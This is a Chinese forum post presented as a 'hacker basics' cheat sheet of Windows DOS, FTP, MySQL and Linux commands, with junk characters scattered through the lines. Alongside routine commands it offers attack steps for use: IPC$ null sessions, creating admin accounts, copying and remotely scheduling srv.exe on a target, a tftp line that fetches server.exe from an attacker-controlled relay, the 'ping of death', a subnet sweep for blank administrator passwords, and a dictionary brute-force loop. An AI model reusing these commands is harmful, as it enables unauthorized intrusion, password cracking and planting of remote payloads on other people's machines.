黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 ( c5 T3 {- }# T; _0 _4 c- X
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 % y. P* H* R/ G# x
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
, Y- k- O- ]( y6 W6 Wnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H:
' B, E7 ^4 W' {, {/ r! Enet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
6 ~" d) h6 O% J* u4 {net use h: /del 删除映射对方到本地的为H:的映射 : g% @& B$ G' X( X# `
net user 用户名　密码　/add 建立用户
! X& \6 L/ r0 {9 s+ hnet user guest /active:yes 激活guest用户 ( d' g- f9 b. C# X: w
net user 查看有哪些用户
& ~0 z- F; j( m7 M% J% Knet user 帐户名 查看帐户的属性
& q1 H+ I1 R. ]9 \# s! Wnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
. x2 A+ r3 H# z& f7 ^9 }net start 查看开启了哪些服务
1 b  a3 z" T# A6 tnet start 服务名　 开启服务；(如:net start telnet， net start schedule) 8 l2 O- g; G( [0 ?) Z$ R5 f/ V
net stop 服务名 停止某服务 / J( o& L1 I  R$ L" A' s- j1 u0 g% Q
net time \\目标ip 查看对方时间 5 Z% z) _6 ^: Q; L
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
* M0 T% j" n9 E# O; N* \7 g6 hnet view 查看本地局域网内开启了哪些共享 # V4 U% A1 ?+ h: }. w; O
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 : J5 M  W9 C, g! A# X0 c
net config 显示系统网络设置 / ^0 T3 J) y$ o" t( }
net logoff 断开连接的共享
4 T% U0 m. @5 j' Znet pause 服务名 暂停某服务 1 n7 ?% H9 u$ Y6 j3 @& V
net send ip "文本信息" 向对方发信息 - ?0 T( |% b! I- O  N
net ver 局域网内正在使用的网络连接类型和信息 / |; j0 f: Q! E( V% _% p3 P: k9 F. Y
net share 查看本地开启的共享 0 y: j) b1 [$ j+ B4 ?
net share ipc$ 开启ipc$共享
4 D2 t0 C) ^  Dnet share ipc$ /del 删除ipc$共享
+ D  w' S7 f( ^" Xnet share c$ /del 删除C：共享
: q, V0 r% Y* `; unet user guest 12345 用guest用户登陆后用将密码改为12345
6 ^$ Y: m, F# `0 z6 vnet password 密码 更改系统登陆密码
; P1 Z8 b7 V  u/ S# G# t# ynetstat -a 查看开启了哪些端口,常用netstat -an
7 ?" t. Y& v: Onetstat -n 查看端口的网络连接情况，常用netstat -an
  {. u4 s0 R# h0 lnetstat -v 查看正在进行的工作
3 x) X0 t3 {  K9 I; V2 {netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
+ F, G2 S4 g; Q7 x4 hnetstat -s 查看正在使用的所有协议使用情况 ' |+ H5 N( }" v% I/ U  R/ G' `
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
# O- P  R. F# I8 Q* |tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 ' R2 d  A+ O, z' G* t8 ~, x/ p, X
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
  Z( s) I, T/ C, R$ i. y- q+ xping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
* r3 i& |; i4 e( ^" d( H3 Sipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 9 Y2 D" u$ s) T) @( ]2 v. L! V
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) 3 @* u  J6 G) ]
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
. O! {6 A/ O! Mdel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
* q& d# @& Y; ]8 K' L- Y% pdel /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
, K9 g/ J9 j/ r7 X% wmove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
/ p5 ~/ V/ ?* ]" qfc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令 0 @& M8 S/ c5 r( V+ M% ^
at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
" J+ ~. W8 n% f  Q- A) Z0 _0 R: nat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 5 Z# I; v* M& d5 @
at id号 /delete 停止某个已注册的计划任务
9 ~/ _5 c+ Z- u% sat 查看所有的计划任务 : Z3 ?; B% U* Q6 m$ v
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 2 v; f) Y' V" h4 Y( u
finger username @host 查看最近有哪些用户登陆
* `' e' h) f2 l4 n4 G7 T3 ftelnet ip 端口 远和登陆服务器,默认端口为23
' e3 s$ w; S( p& D$ ^8 @/ L, uopen ip 连接到IP（属telnet登陆后的命令） , W! [# Q  q; ~% p: n, D
telnet 在本机上直接键入telnet 将进入本机的telnet
6 n# K+ k! X. @0 r3 B: mcopy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
; Z5 _* w- F# D8 g6 Q: l# \; Dcopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 4 d( Q; }" N* q
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 : S) u& h$ ^4 a
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
- q' z# Z# B: L. _" d  m7 Q+ cxcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
1 }  Z' D/ D7 t" X; m) htftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 ; {$ I1 B5 D) `, g: Q* k6 n9 ]
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 / x; e0 m: Q3 n. ]: ^) g
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) 6 E" i8 C4 r: u6 Y
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface 8 a! {( e& X! p  U$ D  {
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
) O1 N- C$ L5 e( c# Ustart 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
, V1 C  N+ t, @7 `+ u! i! l1 y8 ]mem 查看cpu使用情况 1 O. Q2 u  B& Q5 x% R  {; s
attrib 文件名(目录名) 查看某文件（目录）的属性
% j% D) Z, W- F1 c6 hattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
: X: ^% a) n0 p) l1 }dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
' D1 U. p3 f# P8 ddate /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 . {7 \7 s! U' F
set 指定环境变量名称=要指派给变量的字符 设置环境变量 9 P1 U. K  ?7 B1 S$ G
set 显示当前所有的环境变量 7 _. e1 k5 I2 i9 B$ Y
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
4 U, E- r1 y* tpause 暂停批处理程序，并显示出：请按任意键继续....
0 ]7 T4 v2 i4 A2 e3 tif 在批处理程序中执行条件处理（更多说明见if命令及变量）   g* M& B6 D' i( D
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
% n! f  u  Q3 _5 ocall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
5 b! l7 s* ^4 sfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） 6 x9 a" p! x4 w5 Z2 z% Y
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 6 ~$ r2 r- F: a# w+ U
echo 信息 在屏幕上显示出信息 # F8 Q# g* ^! a  O8 r* ?: s1 z- |; r
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
( B  {7 z  ]  m9 w& H5 ofindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
! q" F# e" e. v  i& ~! N- l! r4 mfind 文件名 查找某文件 # Y, p* G: q( q; R& B( K
title 标题名字 更改CMD窗口标题名字 3 h& s& ^% W+ V- c" e+ z. E
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 . Q% n. e6 @+ C! b
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
- @$ x9 R5 e! p6 [  v7 h* Iprint 文件名 打印文本文件 / @5 Q7 V  ]; P7 `& q' f
ver 在DOS窗口下显示版本信息
7 ?$ o- J$ V( V; p! Z  vwinver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
- i- C$ c; i) nformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS $ W: M- z# s) }3 `
md　目录名 创建目录
+ ]; M* i7 I* s0 ]3 T  c4 r# Oreplace 源文件　要替换文件的目录 替换文件 - I* G" j: e, _1 r* S
ren 原文件名　新文件名 重命名文件名 ' l3 D2 u+ y* ^/ _- Q4 j. a1 [
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
0 F0 i# k; l& }8 I) A2 Etype 文件名 显示文本文件的内容 , ?6 N) v2 I* h$ K
more 文件名 逐屏显示输出文件
3 ]8 g" O7 Z2 M9 Y* e- Xdoskey 要锁定的命令＝字符2 @- Z2 Y6 ~- I: M# C8 |4 N& f' L
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
5 Z0 a0 @# t+ Z3 utaskmgr 调出任务管理器 3 l1 Q0 `; R% B1 V/ p- s
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 ) J2 {0 L/ g+ L* h' [2 h" P4 i
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
+ c+ m+ O) I& R; \  s; I& fexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
( c' s6 U9 ]  ^3 V$ e$ hpath 路径\可执行文件的文件名 为可执行文件设置一个路径。
5 v5 o/ ~  G9 A3 U% m2 ycmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? 9 V" J: s9 E  Z& v7 k2 o
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
- F/ W5 h9 m8 j0 I& y2 t9 x2 d, Iregedit /e 注册表文件名 导出注册表
/ m8 Z  M7 R; X) d# ncacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
- X& @+ u% }1 u. Wcacls 文件名 查看文件的访问用户权限列表 : V* f( ~" F4 S
REM 文本内容 在批处理文件中添加注解
$ ?7 a9 q3 R: ?3 S6 qnetsh 查看或更改本地网络配置情况3 d2 V6 [( i, D: x- x4 s
IIS服务命令：9 p+ l: R6 ~7 V; U8 c3 D
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
* |+ c0 Q* `9 \& [! |iisreset /start或stop 启动（停止）所有Internet服务 , s/ K* h( v$ R7 ^. y4 D! x- d# c
iisreset /restart 停止然后重新启动所有Internet服务 - _+ s8 {5 f/ s' c# ]' t" B% B
iisreset /status 显示所有Internet服务状态
) I6 A3 v. E$ C6 a$ Z3 Oiisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 ! H: N, E9 ~+ [/ H* G" W
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
; c  T. K6 G9 x. aiisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
, X8 i: f& \$ M1 t( C% @iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。   K2 u$ g3 j0 p- w7 ]8 X6 T( T
FTP 命令： (后面有详细说明内容) $ D( i9 G- c9 S. @, ^/ L/ \0 l
ftp的命令行格式为:
' j! t6 A# ^, H# xftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。, T' c5 W, A7 m& O/ t+ {/ j
－d 使用调试方式。 $ _& Y' U$ R3 ]
－n 限制ftp的自动登录,即不使用.netrc文件。
+ F- a6 l" n0 d* L－g 取消全局文件名。
& N* {4 ], x1 W  M7 M* Thelp [命令] 或 ？[命令] 查看命令说明 9 ^" N  _) T" W7 o5 S) g5 E. ^3 X
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
% @* w9 a. H( z8 rpwd 列出当前远端主机目录 ; h8 S' F: f/ U  |: F
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
% C$ y) e$ ?8 L/ \4 @6 Bget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 4 _0 Q4 L( m; \9 a5 N
mget [remote-files] 从远端主机接收一批文件至本地主机
( o( q' p2 E, h" x- Kmput local-files 将本地主机中一批文件传送至远端主机
7 s) Q0 P% ^  @$ w% Z# b) `! Qdir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
  V: t. i' z5 p) ]- n9 e5 J$ \2 Uascii 设定以ASCII方式传送文件(缺省值)
) [6 r2 o! c: l6 p: O6 G: k' [: [bin 或 image 设定以二进制方式传送文件
; z+ k5 m0 \1 v2 Y+ Xbell 每完成一次文件传送,报警提示 4 S0 Y. @- k: X( r8 O+ U  |
cdup 返回上一级目录 ! `$ B9 j' O$ `9 S& z+ l
close 中断与远程服务器的ftp会话(与open对应)
9 c' U0 u2 J2 t; U7 P# o/ Lopen host[port] 建立指定ftp服务器连接,可指定连接端口
4 |, C4 b& F3 z: pdelete 删除远端主机中的文件 6 T8 d2 [( l+ _- H8 G" ]) d. F
mdelete [remote-files] 删除一批文件
/ B; K) e% ]+ p8 z8 F; r+ f, Pmkdir directory-name 在远端主机中建立目录
$ F- U# d7 n; S8 U* l, ^4 N  Srename [from] [to] 改变远端主机中的文件名 / l$ r2 e& V; L/ ]- ~: \/ U
rmdir directory-name 删除远端主机中的目录 : m* x; v  d! P. i2 a" c
status 显示当前FTP的状态
; H# S) A0 t' f$ }" gsystem 显示远端主机系统类型 : R$ R" v+ g6 p9 n1 M% u
user user-name [password] [account] 重新以别的用户名登录远端主机 6 v$ Z8 z4 f3 }; r6 C( f! S- n
open host [port] 重新建立一个新的连接
+ j" T4 {% m/ k* _  o& Uprompt 交互提示模式 1 E" F: B9 F) D1 j. }4 m
macdef 定义宏命令
7 u. Z! }$ E/ W0 ~6 Llcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 - d( c; J: ]! [3 _. G. }
chmod 改变远端主机的文件权限
. A) b; C8 K" j% \case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 & p  p- e( F# R- H* L, x
cd remote－dir 进入远程主机目录 3 B/ g8 w5 F' `7 p3 H. |9 ~
cdup 进入远程主机目录的父目录
+ t4 K; O! `+ l  h! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip " j+ Z6 Q* z+ {5 ~5 g. r
MYSQL 命令： : u- N6 r' s$ z
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。' H+ {% r9 r0 M4 N+ ~4 q/ L# W+ n5 q1 B
（例：mysql -h110.110.110.110 -Uroot -P123456 4 _3 @$ K7 T5 K& M8 r6 T
注:u与root可以不用加空格，其它也一样）
4 {4 p; z6 O( H7 @/ ]& H* B) q2 ~4 Eexit 退出MYSQL
$ ~* Q9 O( }9 }mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 2 n# u' w# ?: P8 Z  \6 ~
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
" W# g3 G9 }8 w/ k/ O! Ushow databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 , h& H! |8 Z( C% U# V$ L4 Q7 A
use mysql；5 h% ^6 L, u! {- X5 L2 W/ o" `  ~
show tables; 显示库中的数据表 $ q; [4 Y' S0 ?/ G7 @* F1 j
describe 表名; 显示数据表的结构 " J' L% r- T( n/ `1 r' I# S: Y# i
create database 库名; 建库
" w% a9 W, ]6 i; x# _use 库名；
. |& b2 `; L& p: r0 ]5 e( [create table 表名 (字段设定列表)； 建表 ; B, J9 c! Y. f  i0 r$ ^* e& M/ ?
drop database 库名; 6 {/ n9 J# N: y( M9 G. t; V
drop table 表名； 删库和删表 - N1 M( V  }% q. b6 D" R7 a
delete from 表名; 将表中记录清空 1 N% ?& I0 q3 n# E4 U. ]
select * from 表名; 显示表中的记录
4 h, _. X' |$ V1 q# m, Y* _mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 7 Z6 c: I: W0 j& _+ F
win2003系统下新增命令（实用部份）：
  m& ^, w$ I) z4 xshutdown /参数 关闭或重启本地或远程主机。
3 d4 y: |" e" D( u7 _参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
% H' ~. P% l/ y$ O, V, t( m例：shutdown /r /t 0 立即重启本地主机（无延时） . Q) ^$ P/ W: c2 B
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。, Z5 r( A$ _) E2 _) \
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
6 f, g$ I1 j% ~# ?# e- k1 wtasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
# U! l1 L9 M  i参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程7 ?) l3 X3 s" L8 ?# |  j3 a% k
Linux系统下基本命令： 要区分大小写
* x/ s6 N  f) l: ~uname 显示版本信息（同win2K的 ver）
3 M2 P9 n% w: ]2 p; b# k5 |& ndir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） : T8 h0 ?$ y9 [1 h7 J+ Z% O8 d
pwd 查询当前所在的目录位置 6 y0 f! J2 J, y8 e( y& d
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
* P/ Z) Q/ U( bcat 文件名 查看文件内容 - L" u1 x6 u* o9 m
cat >abc.txt 往abc.txt文件中写上内容。 , j! t- O- J0 e% [. j' D
more 文件名 以一页一页的方式显示一个文本文件。
: p/ S3 ^6 P- @- `5 ^4 v8 @$ Tcp 复制文件
2 G6 C: B3 S3 m- Z( Umv 移动文件 1 x0 o! I: b- O9 v
rm 文件名 删除文件，rm -a 目录名删除目录及子目录 9 A3 |6 P. p- x2 l2 L" j1 N
mkdir 目录名 建立目录 ; _. m- v5 m; e
rmdir 删除子目录，目录内没有文档。   v2 [) y8 |0 g8 M0 m" y
chmod 设定档案或目录的存取权限
' b2 k1 J- U: D' Xgrep 在档案中查找字符串 2 ~4 O- f" W: u, s  h
diff 档案文件比较
1 d. b, n: S$ U( h/ ^, wfind 档案搜寻 9 u6 ]. g  j( x$ v! m5 v
date 现在的日期、时间
2 K  J% g: R, s$ N7 D  ]/ Lwho 查询目前和你使用同一台机器的人以及Login时间地点 1 u2 c4 E2 N$ u! `6 @
w 查询目前上机者的详细资料
9 z# }2 t( p* F' F$ J* x; wwhoami 查看自己的帐号名称
/ X( G  Q. J, Y. }% Rgroups 查看某人的Group : i) j  M( V' U& i9 y9 Q% ^: O
passwd 更改密码 - N4 j, A& J: C/ q2 \$ D
history 查看自己下过的命令 " E1 p4 v9 |$ Y% T% Z
ps 显示进程状态
+ f5 F  w4 M" ]) N, E( Xkill 停止某进程
8 ~6 s* _0 K4 q5 q! f& W% P7 ]+ _gcc 黑客通常用它来编译C语言写的文件
- S3 L; ]: j  }su 权限转换为指定使用者
. Y5 D! x: p% ^" u# n+ Mtelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 ( r+ a9 m9 x; C( R# W0 g4 a
ftp ftp连接上某服务器（同win2K6 R) k- y2 j' W. T0 r" g' I# n6 ~$ E
附：批处理命令与变量3 {) f. L3 i1 r8 b; a2 ~
1：for命令及变量 基本格式： ' [+ X1 h! }2 M; y
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。7 A/ v7 w% p& C: G% D
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%38 s$ F. C. b/ s) [' L
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}) G1 y/ O/ H' r3 d7 ^+ `7 [
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开$ Q+ A( M/ W3 K7 b% g
command_parameters：为特定命令指定参数或命令行开关( v7 j9 w; [# x8 B! X
IN (set)：指在(set)中取值；DO command ：指执行command! C. F' v& v1 R- D8 p
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 % s/ S, d  [: |% S( _, H2 X! g- B8 j
用法举例：
3 z$ g( ]+ C, s; y' I3 l5 D@echo off
9 \6 R, [  \+ @echo 用法格式：test.bat *.*.* > test.txt
( n/ l6 M! c4 kfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
0 o) k0 S4 G6 [. V% ]; b3 f存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。
4 o- `6 f( H" A5 v/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
# j; y' r6 _, m. C, Z" F* [@echo off , y8 a) A: o$ B8 L
echo 用法格式：ok.bat ip
5 h2 F. I  D5 n( J' a/ TFOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
; b/ d; U& z* D. Y: {+ }) W存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。
7 W/ J; U' J0 m/ X* i2 ~( y2：if命令及变量 基本格式： - e1 r, s* E* ^  b  \  c
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
/ K8 c5 F: G, x例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。) Q4 [1 i( R# w" w
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 ( a3 H# d6 R1 _+ F: x2 M5 O, x
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
2 y+ l- X5 ?4 ~' O6 A例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） & b* }( t* N+ m" p7 J
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。* J9 W$ k, P. f6 j& `3 h
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
) X3 J3 k% B$ M; N0 W- gIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”